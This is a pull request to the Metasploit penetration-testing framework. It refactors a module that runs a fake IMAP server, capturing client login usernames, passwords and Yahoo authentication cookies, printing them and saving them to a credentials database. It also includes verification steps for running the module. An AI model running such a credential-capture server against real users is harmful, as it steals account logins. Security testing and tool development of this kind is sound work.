### PR TITLE
Credential Gem: LoginScanner - auxillary/server/capture/imap.rb

### DIFF
--- a/modules/auxiliary/server/capture/imap.rb
+++ b/modules/auxiliary/server/capture/imap.rb
@@ -6,12 +6,10 @@
 
 require 'msf/core'
 
-
 class Metasploit3 < Msf::Auxiliary
 
   include Msf::Exploit::Remote::TcpServer
   include Msf::Auxiliary::Report
-
 
   def initialize
     super(
@@ -56,11 +54,11 @@ class Metasploit3 < Msf::Auxiliary
 
   def on_client_data(c)
     data = c.get_once
-    return if not data
-    num,cmd,arg = data.strip.split(/\s+/, 3)
+    return unless data
+    num, cmd, arg = data.strip.split(/\s+/, 3)
     arg ||= ""
 
-    if(cmd.upcase == "CAPABILITY")
+    if cmd.upcase == 'CAPABILITY'
       c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " +
         "MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " +
         "QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " +
@@ -68,38 +66,26 @@ class Metasploit3 < Msf::Auxiliary
       c.put "#{num} OK CAPABILITY completed.\r\n"
     end
 
-    if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI")
+    # Handle attempt to authenticate using Yahoo's magic cookie
+    # Used by iPhones and Zimbra
+    if cmd.upcase == 'AUTHENTICATE' && arg.upcase == 'XYMPKI'
       c.put "+ \r\n"
       cookie1 = c.get_once
       c.put "+ \r\n"
       cookie2 = c.get_once
-      report_auth_info(
-        :host      => @state[c][:ip],
-        :sname     => 'imap-yahoo',
-        :port      => datastore['SRVPORT'],
-        :source_type => "captured",
-        :user      => cookie1,
-        :pass      => cookie2
-      )
+      register_creds(@state[c][:ip], cookie1, cookie2, 'imap-yahoo')
       return
     end
 
-    if(cmd.upcase == "LOGIN")
+    if cmd.upcase == 'LOGIN'
       @state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)
 
-      report_auth_info(
-        :host      => @state[c][:ip],
-        :port      => datastore['SRVPORT'],
-        :sname     => 'imap',
-        :user      => @state[c][:user],
-        :pass      => @state[c][:pass],
-        :active    => true
-      )
+      register_creds(@state[c][:ip], @state[c][:user], @state[c][:pass], 'imap')
       print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
       return
     end
 
-    if(cmd.upcase == "LOGOUT")
+    if cmd.upcase == 'LOGOUT'
       c.put("* BYE IMAP4rev1 Server logging out\r\n")
       c.put("#{num} OK LOGOUT completed\r\n")
       return
@@ -108,12 +94,43 @@ class Metasploit3 < Msf::Auxiliary
     @state[c][:pass] = data.strip
     c.put "#{num} NO LOGIN FAILURE\r\n"
     return
-
   end
 
   def on_client_close(c)
     @state.delete(c)
   end
 
+  def register_creds(client_ip, user, pass, service_name)
+    # Build service information
+    service_data = {
+      address: client_ip,
+      port: datastore['SRVPORT'],
+      service_name: service_name,
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
 
+    # Build credential information
+    credential_data = {
+      origin_type: :service,
+      module_fullname: self.fullname,
+      private_data: pass,
+      private_type: :password,
+      username: user,
+      workspace_id: myworkspace_id
+    }
+
+    credential_data.merge!(service_data)
+    credential_core = create_credential(credential_data)
+
+    # Assemble the options hash for creating the Metasploit::Credential::Login object
+    login_data = {
+      core: credential_core,
+      status: Metasploit::Model::Login::Status::UNTRIED,
+      workspace_id: myworkspace_id
+    }
+
+    login_data.merge!(service_data)
+    create_credential_login(login_data)
+  end
 end


### PR DESCRIPTION
Refactor 'auxillary/server/capture/imap.rb' to support the Metasploit Credential gem.  Also, a few small changes have been made to make the Ruby a bit more compliant with current standards.

**Verification**
- [x] check out the metasploit-credential branch by using the instructions in the section 'Check out the electro-release branch' at the link below:
    https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Loginpalooza
- [x] `msfconsole`
   Run this as root to bind to port 143
- [x] `use auxiliary/server/capture/imap`
- [x] `run`
  - [ ]  Configure an IMAP client to connect to your msf host
  - [ ]   **VERIFY** that the configured credentials are echoed to the console
- [x]  `creds`
- [x]  **VERIFY** that credentials configured in the IMAP client and echoed to the console are found in the results from creds
